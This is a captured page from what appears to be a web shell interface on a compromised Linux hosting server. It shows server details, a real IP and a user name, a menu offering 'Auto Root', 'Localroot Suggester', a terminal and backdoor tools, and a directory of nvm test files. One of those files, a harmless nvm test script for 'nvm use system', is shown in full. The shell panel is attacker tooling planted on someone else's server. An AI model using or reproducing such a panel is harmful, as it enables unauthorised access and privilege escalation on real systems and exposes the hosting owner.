Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.69
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
.nvm /
test /
fast /
Delete
Unzip
Name
Size
Permission
Date
Action
Aliases
[ DIR ]
drwxrwxr-x
2025-06-22 16:20
Listing paths
[ DIR ]
drwxrwxr-x
2025-06-22 16:20
Listing versions
[ DIR ]
drwxrwxr-x
2025-06-22 16:20
Set Colors
[ DIR ]
drwxrwxr-x
2025-06-22 16:20
Unit tests
[ DIR ]
drwxrwxr-x
2025-06-22 16:20
Running 'nvm alias' should create a file in the alias directory
146
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm current' should display current nvm environment
266
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm deactivate' should unset the nvm environment variables
1010
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm install' with '--reinstall-packages-from' requires a valid version
2.49
KB
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm install' with an invalid version fails nicely
412
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm unalias' should remove the alias file
147
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm uninstall' should remove the appropriate directory
116
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm uninstall' with incorrect file permissions fails nicely
320
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm unload' should unset all function and variables
723
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm use foo' where 'foo' is circular aborts
992
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm use iojs' uses latest io.js version
1
KB
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm use system' should work as expected
1.52
KB
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm use x' should create and change the 'current' symlink
770
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm use x' should not create the 'current' symlink if $NVM_SYMLINK_CURRENT is false
1.98
KB
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm use' should drop CR char automatically
512
B
-rwxrwxr-x
2025-06-22 16:20
Sourcing nvm.sh should make the nvm command available
41
B
-rwxrwxr-x
2025-06-22 16:20
Sourcing nvm.sh should not modify parameters of caller
62
B
-rwxrwxr-x
2025-06-22 16:20
nvm should remove the last trailing slash in $NVM_DIR
395
B
-rw-rw-r--
2025-06-22 16:20
setup
189
B
-rwxrwxr-x
2025-06-22 16:20
setup_dir
195
B
-rwxrwxr-x
2025-06-22 16:20
teardown
196
B
-rwxrwxr-x
2025-06-22 16:20
teardown_dir
157
B
-rwxrwxr-x
2025-06-22 16:20
Save
Rename
#!/bin/sh set -eux cleanup() { unset -f nvm_has_system_node nvm_print_npm_version } die() { echo "$@" ; cleanup ; exit 1; } \. ../../nvm.sh nvm_has_system_node() { return 0; } nvm_print_npm_version() { command printf ' (npm v1.2.3)'; } EXPECTED_OUTPUT="Now using system version of node: $(node -v)$(nvm_print_npm_version)" set +x # since stderr is needed OUTPUT="$(nvm use system 2>&1)" set -x [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "Could not use system version of node. Got >${OUTPUT}<, expected >${EXPECTED_OUTPUT}<" EXPECTED_OUTPUT="" set +x # since stderr is needed OUTPUT="$(nvm use --silent system 2>&1 | tail -1)" set -x [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "Could not use system version of node or --silent was not silent" nvm_has_system_node() { return 1; } nvm_print_npm_version() { command printf ''; } EXPECTED_OUTPUT="System version of node not found." set +x # since stderr is needed OUTPUT="$(nvm use system 2>&1 | tail -1)" set -x [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "Did not report error, system node not found" nvm use system 2>&1 > /dev/null || [ $? -eq 127 ] || die "Did not return error code, system node not found" EXPECTED_OUTPUT="" set +x # since stderr is needed OUTPUT="$(nvm use --silent system 2>&1 | tail -1)" set -x [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "Did not report error, system node not found or --silent was not silent" nvm use --silent system 2>&1 > /dev/null || [ $? -eq 127 ] || die "Did not return error code, system node not found or --silent was not silent" cleanup